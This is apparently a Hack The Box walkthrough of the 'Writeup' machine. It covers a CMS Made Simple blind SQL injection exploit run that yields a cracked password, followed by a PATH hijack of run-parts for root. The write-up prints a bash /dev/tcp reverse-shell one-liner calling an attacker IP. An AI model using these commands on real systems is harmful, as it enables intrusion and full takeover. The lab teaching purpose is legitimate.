---
title: "HTB: Writeup"
date: 2021-07-13
classes: wide
categories:
  - Hackthebox
tag:
  - cms made simple 
  - remote code execution 
  - sql injection
  - path priv esc
toc: true
---

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/writeup/writeup.png" alt="">

# Summary 

Writeup was a challenging machine that revolved around finding a vulnerable version of cms made simple which was prone to blind sql injection, which allowed me to get the user for jkr on the box. The priv esc was the most challenging aspect about this machine because linpeas simply won't find it, so I spend a long time looking at linpeas output to try to find the priv esc vector and couldn't find it. I needed to use pspy32 which is a tool that monitors for processes that are running and see that when an ssh session is established it runs a script run-parts from /bin However the issue comes when jkr is a member of staff which has permissions to write to /usr/local/bin which is a directory that linux looks for run-parts from and because run-parts doesn't use an absolute path and /usr/local/bin comes before /bin in the path variable I can simply place a malicious file that will get executed as root once I login to ssh. So lets jump into writeup!

# Recon

```
$nmap -A -oN nmap/initial.txt $ip 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-12 19:13 BST
Nmap scan report for 10.10.10.138
Host is up (0.017s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/writeup/
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.24 seconds
```

all port scan 

```
$nmap -p- -oN nmap/all-ports $ip
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-12 19:14 BST
Nmap scan report for 10.10.10.138
Host is up (0.013s latency).
Not shown: 65533 filtered ports
PORT   STATE  SERVICE
22/tcp open   ssh
80/tcp closed http

Nmap done: 1 IP address (1 host up) scanned in 104.60 seconds
```

Strange  that http was now showing up as closed. Perhaps there is some kind of port kncking that closes the http port when you do an all port scan?

# Enumeration of Services

## HTTP 80

Navigating to the webpage gave this page

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/writeup/1.png" alt="">

from my nmap scan I know that there is a writeup directory so I visit that and looking around it appears there are just writeups for retired hackthebox machines. 

I looked at the source code and it was using cms made simple

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/writeup/2.png" alt="">

Which a searchsploit shows that this has a few vulnerabilities 

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/writeup/3.png" alt="">

Next I ran a gobuster to see if I could find a directory that would tell me what version of cms made simple was running. However it appeared that there was some kind of firewall on this server that closed port 80 anytime enumeration of directories is attempted. So I don't think that there is anyway to enumerate directories on this webserver. 

# Shell as jkr

Looking online for exploits related to this version of cms made simple showed that there was an sql injection exploit <https://www.exploit-db.com/exploits/46635> Downloading and running this exploit with the following arguments 

```
$python2 46635.py -u http://10.10.10.138/writeup -c -w /usr/share/wordlists/rockyou.txt 
```

Gave the password for the jkr user 

```
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9
```

Using these credentials to login to ssh worked and I now had a shell as the jkr user

# jkr => Root

The priv esc here was difficult because enumeration scripts like linpeas that I ran didn't really show this priv esc vector. But it first begins by noticing that jkr is a member of the staff group

```
jkr@writeup:/$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
```

and the staff group from <https://wiki.debian.org/SystemGroups> "**staff**: Allows users to add local modifications to the system (/usr/local) without needing root privileges (note that executables in /usr/local/bin are in the PATH variable of any user, and they may "override" the executables in /bin and /usr/bin with the same name). Compare with group "adm", which is more related to monitoring/security."

Next you needed to use pspy32 and notice that when you ssh into the machine it runs the following commands

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/writeup/4.png" alt="">

Doing a find command looking for the run-parts file shows its in /bin/run-parts

```
jkr@writeup:~$ find / -name run-parts 2>/dev/null
/bin/run-parts
```

Looking at the PATH variable that is being assigned when root executes run-parts shows that /usr/local/bin is being searched for before it goes to /bin/run-parts Meaning that we can put our malicious file in /usr/local/bin/run-parts and it will execute this instead of /bin/run-parts because the path variable has it so that it looks for run-parts in /usr/local/bin/ first. Hopefully that made sense.

I tried several times to have it send back a reverse shell but couldn't get it to work and ended up with this solution

```
jkr@writeup:~$ echo "bash /home/jkr/work.sh" > /usr/local/bin/run-parts
jkr@writeup:~$ chmod +x /usr/local/bin/run-parts
jkr@writeup:~$ cat work.sh 
/bin/bash -i >& /dev/tcp/10.10.16.91/4444 0>&1
jkr@writeup:~$ 
```
So the file /usr/local/bin/run-parts just runs the script that has a reverse shell one liner inside and with this I managed to get a reverse shell as the root user after logging into ssh (so that it executes my version of /usr/local/bin/run-parts)

```
──╼ $nc -lvp 4444
listening on [any] 4444 ...
q10.10.10.138: inverse host lookup failed: Unknown host
connect to [10.10.16.91] from (UNKNOWN) [10.10.10.138] 35592
bash: cannot set terminal process group (17389): Inappropriate ioctl for device
bash: no job control in this shell
root@writeup:/# ls
qls
bash: qls: command not found
root@writeup:/# whoami
whoami
root   
```

That was root on writeup from hackthebox! Hope you enjoyed!